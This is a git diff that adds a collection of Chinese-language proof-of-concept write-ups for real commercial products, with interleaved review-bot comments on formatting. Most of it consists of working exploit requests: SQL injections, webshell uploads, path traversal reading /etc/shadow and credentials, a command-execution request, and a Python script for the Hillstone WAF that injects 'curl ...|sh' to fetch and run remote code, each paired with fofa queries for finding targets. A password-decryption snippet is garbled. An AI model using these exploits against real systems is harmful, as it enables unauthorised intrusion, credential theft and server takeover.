@@ -0,0 +1,40 @@ +# 宝塔云WAF server_name存在SQL注入漏洞 + +# 一、漏洞简介 +免费的私有云WAF防火墙 堡塔云WAF经过千万级用户认证、为您的业务保驾护航 采用反向代理的方式,网站流量先抵达堡塔云WAF 经过堡塔云WAF检测和过滤后,再转给原来提供服务的网站服务器。堡塔云WAF是一个开源的Web应用程序防火墙,它可以保护网站免受SQL注入,XSS,CSRF,SSRF,命令注入,代码注入,本地文件包含,远程文件包含等攻击 兼容ARM和国产系统。堡塔云WAF server_name 接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。 + +# 二、影响版本 ++ 堡塔云WAF + +# 三、资产测绘 +```plain +title=="404 - Website not exist!" +``` + +![1716743462186-060cdafd-f235-444f-add4-509093fc03bb.png](./img/F3T28ybLHGApE49W/1716743462186-060cdafd-f235-444f-add4-509093fc03bb-402365.png) + +# 四、漏洞复现 +```plain +GET /get_site_status?server_name='-extractvalue(1,concat(0x5c,123456789))-'1 HTTP/2 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1716743506890-41bf9b47-7da0-49f2-a79d-e2eccbe791ac.png](./img/F3T28ybLHGApE49W/1716743506890-41bf9b47-7da0-49f2-a79d-e2eccbe791ac-585749.png) + +sqlmap: + +```plain +GET /get_site_status?server_name=1 HTTP/2 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1716743771618-53fc5769-795f-4889-beb4-3138047c77d0.png](./img/F3T28ybLHGApE49W/1716743771618-53fc5769-795f-4889-beb4-3138047c77d0-630594.png) + + + +> 更新: 2024-06-01 11:17:59 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ck7t8ensptmf97se> \ No newline at end of file diff --git a/富通天下外贸ERPUploadEmailAttr存在任意文件上传漏洞.md b/富通天下外贸ERPUploadEmailAttr存在任意文件上传漏洞.md new file mode 100644 index 0000000..346447a --- /dev/null +++ b/富通天下外贸ERPUploadEmailAttr存在任意文件上传漏洞.md 
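Review bot: 影响版本 lists only `堡塔云WAF` even though the 漏洞简介 describes the product as open source, so a version range or the fixed release should be given. The 漏洞简介 also claims the attacker can add, delete or modify records, but the only request shown uses `extractvalue(1,concat(0x5c,123456789))`, an error-based read, so the impact statement goes beyond what the hunk demonstrates; describe it as information disclosure unless write access was verified. The `sqlmap:` subsection repeats the plain request and says nothing about what the screenshot shows.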
@@ -0,0 +1,49 @@ +# 富通天下外贸ERP UploadEmailAttr存在任意文件上传漏洞 + +# 一、漏洞简介 +富通天下外贸ERP基于二维界面管理功能,用户可对客户进行精细化的服务和跟踪,客户基本情况、邮件往来样品寄送记录、报价记录、定金收款情况等,信息脉络化,外贸管理软件让您全方位俯瞰客户管理。该系统存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 富通天下外贸ERP + +# 三、资产测绘 ++ fofa`title="用户登录_富通天下外贸ERP"` ++ 特征 + +![1713317155013-b6ef7c19-c580-49fc-b352-d4cd4f06a47e.png](./img/9M-_KrPGGCIelEMF/1713317155013-b6ef7c19-c580-49fc-b352-d4cd4f06a47e-088702.png) + +# 四、漏洞复现 +```plain +POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +<% @ webhandler language="C#" class="AverageHandler" %> +using System; +using System.Web; +public class AverageHandler : IHttpHandler +{ +public bool IsReusable +{ get { return true; } } +public void ProcessRequest(HttpContext ctx) +{ +ctx.Response.Write("hello"); +} +} +``` + +![1713317237034-4f5b8a5e-4517-4159-a8dc-98dc7538b480.png](./img/9M-_KrPGGCIelEMF/1713317237034-4f5b8a5e-4517-4159-a8dc-98dc7538b480-766000.png) + +文件上传位置 + +```plain +/JoinfWebFile/temp/emailatta/202404/20240417D636C4D1F279410CB324E1AFFE28B141.ashx +``` + +![1713317277788-4eb77664-b181-480c-9914-8a1b6082429a.png](./img/9M-_KrPGGCIelEMF/1713317277788-4eb77664-b181-480c-9914-8a1b6082429a-053808.png) + + + +> 更新: 2024-04-17 14:59:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zy1m23vzu6i6aq36> \ No newline at end of file diff --git a/小米路由器任意文件读取漏洞.md b/小米路由器任意文件读取漏洞.md new file mode 100644 index 0000000..9b0fd17 --- /dev/null +++ b/小米路由器任意文件读取漏洞.md 
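Review bot: the 文件上传位置 path `/JoinfWebFile/temp/emailatta/202404/20240417D636C4D1F279410CB324E1AFFE28B141.ashx` is a date-plus-id name, but the text does not say where it comes from (presumably a field in the response to the POST); state which response field carries the stored path, otherwise the path in the write-up is not reproducible. 影响版本 gives only the product name with no affected or fixed version.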
@@ -0,0 +1,40 @@ +# 小米路由器任意文件读取漏洞 + +# 一、漏洞简介 +小米路由器是一款高配的智能路由器,具备强大的扩展,并且具备高速传输的特点,其传输速度最高可以达到866M,相比普通150M/300M的普通无线路由器具备更高无线传输速率。小米路由器系统任意文件读取漏洞 + +# 二、影响版本 ++ 小米路由器 + +# 三、资产测绘 +```plain +app="小米路由器" +``` + +![1717231971362-917b53db-2985-4d7c-8a42-118940873a2c.png](./img/Qww4sdoQYgfh-0gQ/1717231971362-917b53db-2985-4d7c-8a42-118940873a2c-622952.png) + +# 四、漏洞复现 +```plain +GET /api-third-party/download/extdisks../etc/shadow HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 +Accept-Encoding: gzip, deflate +``` + +![1717231994318-8206991d-9a44-4abd-9620-1259bfb61336.png](./img/Qww4sdoQYgfh-0gQ/1717231994318-8206991d-9a44-4abd-9620-1259bfb61336-319945.png) + +读取登录密码 + +```plain +GET /api-third-party/download/extdisks../etc/config/account HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 +Accept-Encoding: gzip, deflate +``` + +![1717233232303-77763c87-be53-47c2-9d2d-07df3e961f46.png](./img/Qww4sdoQYgfh-0gQ/1717233232303-77763c87-be53-47c2-9d2d-07df3e961f46-241369.png) + + + +> 更新: 2024-06-11 10:30:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/slv3fogu0wvlvht3> \ No newline at end of file diff --git a/山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞.md b/山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞.md new file mode 100644 index 0000000..9199b4f --- /dev/null +++ b/山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞.md 
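Review bot: the last sentence of 漏洞简介, `小米路由器系统任意文件读取漏洞`, is a fragment with no verb and says nothing about what is exposed; the two requests read `/etc/shadow` and `/etc/config/account` through `/api-third-party/download/extdisks../`, so one sentence stating that the download endpoint follows `..` out of the external-disk directory belongs there. 影响版本 lists only `小米路由器` with no firmware version, and the 资产测绘 query `app="小米路由器"` does not say which search engine it is for, unlike the other files that label fofa or hunter.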
@@ -0,0 +1,62 @@ +# 山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞 + +# 一、产品简介 +<font style="color:rgb(51, 51, 51);">山石网科是中国网络安全行业的技术创新领导厂商</font><sup><font style="color:rgb(51, 102, 204);"> </font></sup><font style="color:rgb(51, 51, 51);">,自成立以来为金融、政府、互联网、教育、医疗卫生等行业的超过26000家客户提供高效、稳定的安全防护服务。山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞,可导致系统被攻击者执行任意命令。</font> + +# <font style="color:rgb(0, 0, 0);">二、影响版本</font> ++ 山石网科云鉴安全管理系统 + +# <font style="color:rgb(0, 0, 0);">三、资产测绘</font> ++ fofa`body=山石云鉴主机安全管理系统||icon_hash="572290418"` ++ 特征 + +![1715078394101-31b6a8b4-b52f-42ab-8636-c684e2531bb7.png](./img/wxEwBAW_TIPk5zJS/1715078394101-31b6a8b4-b52f-42ab-8636-c684e2531bb7-365277.png) + +# 四、漏洞复现 +1. 获取token与cookie + +```plain +GET /master/ajaxActions/getTokenAction.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Connection: close +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate, br +``` + +![1715157818803-e44a7f91-955e-4399-a150-3f3d7ecdd258.png](./img/wxEwBAW_TIPk5zJS/1715157818803-e44a7f91-955e-4399-a150-3f3d7ecdd258-372501.png) + +2. 使用上一步获取的token与cookie执行命令 + +```plain +POST /master/ajaxActions/setSystemTimeAction.php?token_csrf=a64cca09285de26ca4ebfefa629edd02 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 90 +Accept: */* +Accept-Encoding: gzip, deflate, br +Connection: close +Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID=3ovusd429biqeot6ioje7q06r0 + +param=os.system('echo 8888881 > /opt/var/majorsec/installation/master/runtime/img/config') +``` + +![1715157802540-1acb09fb-b3fc-48b6-a0fc-64f1c542d681.png](./img/wxEwBAW_TIPk5zJS/1715157802540-1acb09fb-b3fc-48b6-a0fc-64f1c542d681-368550.png) + +2. 
获取命令执行结果 + +```plain +GET /master/img/config HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Connection: close +Accept-Encoding: gzip, deflate, br +``` + +![1715157874584-965625d3-c321-4dab-87f4-fefe9baa380c.png](./img/wxEwBAW_TIPk5zJS/1715157874584-965625d3-c321-4dab-87f4-fefe9baa380c-568641.png) + + + +> 更新: 2024-05-20 13:57:29 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ktu0gkdf8p351xdi> \ No newline at end of file diff --git a/山石网科应用防火墙WAF未授权命令注入漏洞.md b/山石网科应用防火墙WAF未授权命令注入漏洞.md new file mode 100644 index 0000000..8d14f7c --- /dev/null +++ b/山石网科应用防火墙WAF未授权命令注入漏洞.md @@ -0,0 +1,45 @@ +# 山石网科应用防火墙WAF未授权命令注入漏洞 + +山石网科 Web 应用防火墙(WAF)是专业智能的Web 应用安全防护产品,在Web资产发现、漏洞评估、流量学习、威胁定位等方面全面应用智能分析和语义分析技术,帮助用户轻松应对应用层风险,确保网站全天候的安全运营。 + +在WAF的验证码页面,存在命令注入漏洞,恶意攻击者可通过构造恶意请求,拼接命令执行任意代码,控制服务器。 + +**受影响版本:** +5.5R6-2.6.7~5.5R6-2.8.13 + +## fofa + +```yaml +icon_hash="-839455805" +``` + +## poc + +```python +import requests,sys +requests.packages.urllib3.disable_warnings() +session = requests.Session() + +target = "https://192.168.247.196/".strip("/") +cmd="curl\x24{IFS}192.168.247.1:9999/cccc|sh" +url = target+"/rest/captcha" +headers = {"Accept":"*/*","User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Accept-Language":"en;q=0.9"} +sss=requests.get(url,headers=headers,verify=False) + +if "PNG" not in sss.content: + print("target not vuln") + sys.exit() + + + + +cookies = {"PHPSESSID":"aaaaaaaaaa%3b"+cmd+"%3bd"} +try: + response = session.get(target+"/rest/captcha", headers=headers, cookies=cookies,verify=False,timeout=5) +except requests.exceptions.ReadTimeout: + print("payload work") + sys.exit() + +print("payload send!") +``` + diff --git a/帆软报表-V8-get_geo_json-任意文件读取漏洞.md b/帆软报表-V8-get_geo_json-任意文件读取漏洞.md new file mode 100644 index 0000000..649c9ea --- /dev/null +++ b/帆软报表-V8-get_geo_json-任意文件读取漏洞.md 
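Review bot: the numbered steps under 漏洞复现 in the 云鉴 hunk run 1., 2., 2.; the third step (`获取命令执行结果`) should be 3. The second request hard-codes `token_csrf=a64cca09285de26ca4ebfefa629edd02` and `PHPSESSID=3ovusd429biqeot6ioje7q06r0` while the text says both come from step 1, so mark them as placeholders rather than literal values. The headings and first paragraph are wrapped in `<font style=...>` and `<sup>` tags left over from the Yuque export; the rest of the commit uses plain markdown headings.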
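Review bot: the 山石网科 WAF hunk gives 受影响版本 as `5.5R6-2.6.7~5.5R6-2.8.13` but cites no fixed version or vendor advisory, so a reader cannot tell which release closes it. In the script, `target`, `cmd` and the address `192.168.247.1:9999` are lab-specific literals with no comment marking them as values to replace, whereas the HTTP-request write-ups in this commit leave `Host:` blank for that purpose; a one-line comment on each would make the script's assumptions explicit.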
@@ -0,0 +1,27 @@ +## 帆软报表 V8 get_geo_json 任意文件读取漏洞 + +## fofa +``` +body="isSupportForgetPwd" +``` + +![image](https://github.com/wy876/POC/assets/139549762/b38dbaa3-3103-45e7-980b-7f3adf6a95ba) + + +## poc +``` +WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml +``` + +获得账号密码后进行解密,解密脚本如下 +## 解密脚本 +```python +cipher = 'XXXXXXXXXXX' #密文 +PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] +Password = "" cipher = cipher[3:] +for i in range(int(len(cipher) / 4)): +c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16) +c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8] +Password = Password + chr(c2) +print (Password) +``` diff --git a/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞 2.md b/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞 2.md new file mode 100644 index 0000000..99e6cb0 --- /dev/null +++ b/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞 2.md 
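Review bot: the 解密脚本 block lost its line structure: `Password = "" cipher = cipher[3:]` is two statements on one line, and the three lines of the `for` body are not indented, so the snippet does not parse as Python; restore the line break and the indentation. The `fofa` and `poc` blocks use bare fences with no language while the script is fenced python; label them plain for consistency with the other files.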
@@ -0,0 +1,42 @@ +# 帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞 + +# 一、漏洞简介 +帕拉迪堡垒机支持移动管理和运维BYOD。移动管理和运维逐渐成为刚需,通过专用App从管理者和运维者角度进行多方位管理和操作。对服务器和网络中的各种帐号都能一键收集,对其状态一目了然,并做到最全单点登录。可编程环境通道。可进行自动化程序穿透,通过API接口,让运维自动化不再是法外之地,整个自动化过程可管理可审计,帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞 + +# 二、影响版本 +帕拉迪堡垒机 + +# 三、资产测绘 ++ fofa `app="帕拉迪Core4A-UTM"` ++ 特征 + +![1732591708185-7197ed3c-426d-406d-87bc-e274f1e91112.png](./img/dMM0XuD_mFjW1yLK/1732591708185-7197ed3c-426d-406d-87bc-e274f1e91112-569324.png) + +# 四 、漏洞复现 +```java +POST /sslvpnservice.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Connection: close +Cookie: PHPSESSID=8fdj8pske96v2qdg13g36u8872; think_language=zh-cn +Content-Type: text/xml +Content-Length: 580 + +<?xml version="1.0" encoding="ISO-8859-1"?> +<SOAP-ENV:Envelope SOAPENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAPENV="http://schemas.xmlsoap.org/soap/envelope/" +xmlns:xsd="http://www.w3.org/2001/XMLSchema" +xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/"> +<SOAP-ENV:Body> +<getAccountDetail> +<data> +{"token":"4e28b56969e59a18d72d0050a47f812a","user":"superman","acctid":"-1' or +1=if(1=1,1,2) limit 0,1 -- a","index":"1"}</data> +</getAccountDetail> +</SOAP-ENV:Body></SOAP-ENV:Envelope> +``` + + + +> 更新: 2024-11-27 10:04:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yxne8q3lvcvl18bl> \ No newline at end of file diff --git a/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md b/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md new file mode 100644 index 0000000..56e6c48 --- /dev/null +++ b/帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md 
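Review bot: the request carries `token`, `user` and a `PHPSESSID` cookie, but the text never says whether `/sslvpnservice.php` checks any of them, so the reader cannot tell from the hunk whether this is pre-auth; state the precondition. `Content-Length: 580` does not match the body as shown, and the body is reflowed across lines (`-1' or` / `1=if(...)`), so the request as pasted is not byte-accurate. The filename ends in ` 2.md`, a duplicate of `帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md` added in the same commit with the same request; merge the two.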
@@ -0,0 +1,57 @@ +# 帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞 + +帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞 + +## poc + +```javascript +POST /sslvpnservice.php HTTP/1.1 +Host: xxxx +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Connection: close +Cookie: PHPSESSID=8fdj8pske96v2qdg13g36u8872; think_language=zh-cn +Content-Type: text/xml +Content-Length: 580 + +<?xml version="1.0" encoding="ISO-8859-1"?> +<SOAP-ENV:Envelope SOAPENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAPENV="http://schemas.xmlsoap.org/soap/envelope/" +xmlns:xsd="http://www.w3.org/2001/XMLSchema" +xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/"> +<SOAP-ENV:Body> +<getAccountDetail> +<data> +{"token":"4e28b56969e59a18d72d0050a47f812a","user":"superman","acctid":"-1' or +1=if(1=1,1,2) limit 0,1 -- a","index":"1"}</data> +</getAccountDetail> +</SOAP-ENV:Body></SOAP-ENV:Envelope> +``` + +```javascript +POST /sslvpnservice.php HTTP/1.1 +Host: xxxx +Connection: close +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Cookie: PHPSESSID=8fdj8pske96v2qdg13g36u8872; think_language=zh-cn +Content-Type: text/xml +Content-Length: 580 + +<?xml version="1.0" encoding="ISO-8859-1"?> +<SOAP-ENV:Envelope SOAPENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAPENV="http://schemas.xmlsoap.org/soap/envelope/" +xmlns:xsd="http://www.w3.org/2001/XMLSchema" +xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/"> +<SOAP-ENV:Body> +<getAccountDetail> +<data> +{"token":"4e28b56969e59a18d72d0050a47f812a","user":"superman","acctid":"-1' or +1=if(1=1*,1,2) limit 0,1 -- a","index":"1"}</data> +</getAccountDetail> +</SOAP-ENV:Body></SOAP-ENV:Envelope> +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/vllWjQIXB7vQR0IjUgXpww \ 
No newline at end of file diff --git a/帮管客CRMajax_upload_chat存在任意文件上传漏洞.md b/帮管客CRMajax_upload_chat存在任意文件上传漏洞.md new file mode 100644 index 0000000..d477eea --- /dev/null +++ b/帮管客CRMajax_upload_chat存在任意文件上传漏洞.md @@ -0,0 +1,48 @@ +# 帮管客CRM ajax_upload_chat存在任意文件上传漏洞 + +# 一、漏洞简介 +帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统,客户管理,从未如此简单,一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化.帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞,未经授权的攻击者可利用该漏洞获取服务器权限。 + +# 二、影响版本 ++ 帮管客CRM + +# 三、资产测绘 ++ fofa`app="帮管客-CRM"` ++ 特征 + +![1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc.png](./img/h4aYWkJUdTJ5y2vF/1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc-024774.png) + +# 四、漏洞复现 +```plain +POST /index.php/upload/ajax_upload_chat HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o + +------WebKitFormBoundaryv1WbOn5o +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/jpeg + +<?php +phpinfo();unlink(__FILE__); +------WebKitFormBoundaryv1WbOn5o-- +``` + +![1706690830026-a7bab378-c87a-46bc-85d4-686ab7e8fb18.png](./img/h4aYWkJUdTJ5y2vF/1706690830026-a7bab378-c87a-46bc-85d4-686ab7e8fb18-379617.png) + +上传文件位置 + +```plain +//data//uploads//uploads_chat//202401//202401311645381ARfoVrTb.php +``` + +![1706690872806-eb87eaac-9761-44e5-8d65-22646a6ab0f5.png](./img/h4aYWkJUdTJ5y2vF/1706690872806-eb87eaac-9761-44e5-8d65-22646a6ab0f5-162023.png) + + + +> 更新: 2024-02-29 23:55:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zv9kvh2812magvgl> \ No newline at end of file diff --git a/帮管客CRMajax_upload存在任意文件上传漏洞.md b/帮管客CRMajax_upload存在任意文件上传漏洞.md new file mode 100644 index 0000000..10b2d0c --- /dev/null 
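Review bot: the 帕拉迪 hunk repeats the request already in the ` 2.md` sibling and then shows a second request that differs only in `1=if(1=1*,1,2)`, with no text explaining what the second block is for; either explain it or drop it. This file has the 漏洞来源 citation the sibling lacks, while the sibling has the 简介/影响版本/资产测绘 sections this one lacks; keep one file with both.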
+++ b/帮管客CRMajax_upload存在任意文件上传漏洞.md @@ -0,0 +1,48 @@ +# 帮管客CRM ajax_upload存在任意文件上传漏洞 + +# 一、漏洞简介 +帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统,客户管理,从未如此简单,一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化.帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞,未经授权的攻击者可利用该漏洞获取服务器权限。 + +# 二、影响版本 ++ 帮管客CRM + +# 三、资产测绘 ++ fofa`app="帮管客-CRM"` ++ 特征 + +![1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc.png](./img/-q9KN7Vz-WxptVyQ/1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc-081759.png) + +# 四、漏洞复现 +```plain +POST /index.php/upload/ajax_upload HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o + +------WebKitFormBoundaryv1WbOn5o +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/jpeg + +<?php +phpinfo();unlink(__FILE__); +------WebKitFormBoundaryv1WbOn5o-- +``` + +![1706690699374-5bb1431f-958f-4d90-8541-9938e4c2a1d4.png](./img/-q9KN7Vz-WxptVyQ/1706690699374-5bb1431f-958f-4d90-8541-9938e4c2a1d4-672428.png) + +上传文件位置 + +```plain +//data//uploads//202401//202401311642767GFUPHdsA.php +``` + +![1706690729835-bf862932-a71e-4dd3-b157-3cd0f62be938.png](./img/-q9KN7Vz-WxptVyQ/1706690729835-bf862932-a71e-4dd3-b157-3cd0f62be938-486853.png) + + + +> 更新: 2024-02-29 23:55:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gx3kacfb8q9w0bdb> \ No newline at end of file diff --git a/帮管客CRMinit信息泄露漏洞.md b/帮管客CRMinit信息泄露漏洞.md new file mode 100644 index 0000000..e5e9c32 --- /dev/null +++ b/帮管客CRMinit信息泄露漏洞.md 
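Review bot: the `ajax_upload` hunk and the `ajax_upload_chat` file before it share a word-for-word 漏洞简介, the same screenshot `1706689730844-244c90a3-...png` and the same multipart body; only the endpoint (`/index.php/upload/ajax_upload` vs `/index.php/upload/ajax_upload_chat`) and the returned path differ, and the 简介 already names both endpoints, so one write-up listing both would avoid the duplication. The returned paths `//data//uploads//202401//...` have doubled slashes; say whether the server returns them that way or it is a copy artifact. 影响版本 lists only the product name.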
@@ -0,0 +1,41 @@ +# 帮管客CRM init 信息泄露漏洞 + +# 一、漏洞简介 +帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统,客户管理,从未如此简单,一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化.帮管客CRM init 信息泄露漏洞 + +# 二、影响版本 ++ 帮管客CRM + +# 三、资产测绘 ++ fofa`app="帮管客-CRM"` ++ 特征 + +![1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc.png](./img/qSUgLfGAWWht2e5C/1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc-199793.png) + +# 四、漏洞复现 +```plain +GET /index.php/chat/init HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1707102932058-96647d60-8fd3-4db1-8d73-867b3eb902da.png](./img/qSUgLfGAWWht2e5C/1707102932058-96647d60-8fd3-4db1-8d73-867b3eb902da-984311.png) + +使用泄漏的账号密码登陆系统 + +![1707103077320-0d5620ba-3942-4301-94bb-a7b11dd1faae.png](./img/qSUgLfGAWWht2e5C/1707103077320-0d5620ba-3942-4301-94bb-a7b11dd1faae-189968.png) + + + +> 更新: 2024-02-29 23:55:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mc3s6wuyw1qn9n0t> \ No newline at end of file diff --git a/帮管客CRMmessage存在SQL注入漏洞.md b/帮管客CRMmessage存在SQL注入漏洞.md new file mode 100644 index 0000000..853cc35 --- /dev/null +++ b/帮管客CRMmessage存在SQL注入漏洞.md 
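Review bot: the text says `使用泄漏的账号密码登陆系统` but never states which fields of the `/index.php/chat/init` response carry the credentials or whether they are plaintext or hashed; the screenshot is the only evidence, so describe the response in a sentence. `登陆` should be `登录`, and the 漏洞简介 ends with the fragment `帮管客CRM init 信息泄露漏洞` glued to the marketing sentence with no punctuation.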
@@ -0,0 +1,41 @@ +# 帮管客CRM message存在SQL注入漏洞 + +# 一、漏洞简介 +帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统,客户管理,从未如此简单,一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化帮管客CRM 客户管理系统/index.php/message 接口存在 sql 注入漏洞,未经身份认证的攻击者可通过此漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 帮管客CRM + +# 三、资产测绘 ++ fofa`app="帮管客-CRM"` ++ 特征 + +![1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc.png](./img/haFr-bDMJulNGjGU/1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc-120634.png) + +# 四、漏洞复现 +```plain +GET /index.php/message?page=1&pai=1%20and%20extractvalue(0x7e,concat(0x7e,(select+md5(1)),0x7e))%23&xu=desc HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![1706689959197-d1cbe09b-080c-476c-802c-d6bb9a6e2fab.png](./img/haFr-bDMJulNGjGU/1706689959197-d1cbe09b-080c-476c-802c-d6bb9a6e2fab-064551.png) + +```plain +c4ca4238a0b923820dcc509a6f75849 +``` + +sqlmap + +```plain +/index.php/message?page=1&pai=1 +``` + +![1706690225476-e322a53f-2bd6-47ce-a68c-6e96bde9ba0b.png](./img/haFr-bDMJulNGjGU/1706690225476-e322a53f-2bd6-47ce-a68c-6e96bde9ba0b-839621.png) + + + +> 更新: 2024-02-29 23:55:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mqhzq6w8dmpgikxd> \ No newline at end of 